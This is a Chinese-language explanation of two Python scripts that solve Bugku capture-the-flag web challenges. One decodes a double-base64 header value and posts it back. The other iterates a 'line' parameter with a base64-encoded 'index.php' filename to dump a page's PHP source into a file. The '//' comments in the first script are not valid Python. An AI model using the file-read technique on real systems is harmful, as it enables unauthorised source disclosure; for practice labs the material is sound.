bugku题中的python脚本解释

bugku-速度要快

#-*- coding:utf-8-*-

import requests   //get，post方法
import base64    //base64加解密模块
url="http://xxx.ddd.dg:8002/web6/"
r=requests.session()   //创建session
headers=r.get(url).headers  //用get方式获取url的headers信息，因为flag在headers
mid=base64.b64decode(headers['flag'])  //将headers中的flag用base64解码,解码后的类型为bytes
mid=mid.decode()  //以字符串编码（默认）的方法解码字符串，

flag=base64.b64decode(mid.split(':')[1])//选用的密文是加密了两次，第一次解密后的密文格式是flag:xxx,所以获取的是:后的值，[1]表示选取第2个分片（从0开始）
data={'margin':flag}  //这个是传值给margin
print(r.post(url,data).text)//post方法传上去

————————————————————————————————————————————————————————————————

bugku-cookie欺骗

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date    : 2017-10-28 09:36:41
# @Author  : csu_vc
# @Link    : http://blog.csdn.net/csu_vc


import requests
s=requests.Session()
url='http://123.206.87.240:8002/web11/index.php'  
for i in range(1,20):   #在范围1到20内遍历
   # payload={'line':str(i),'filename':'aW5kZXgucGhw'}
   # a=s.get(url,params=payload ).content                                  #可以用这种表示发法
    a=s.get(url,params={'line':str(i),'filename':'aW5kZXgucGhw'}).content    #也可以用这种表示方法，content
    content=str(a,encoding="utf-8")
    #print(content)
    f = open("model_Weight1.txt",'a')
    f.write(content)
    f.write('\n')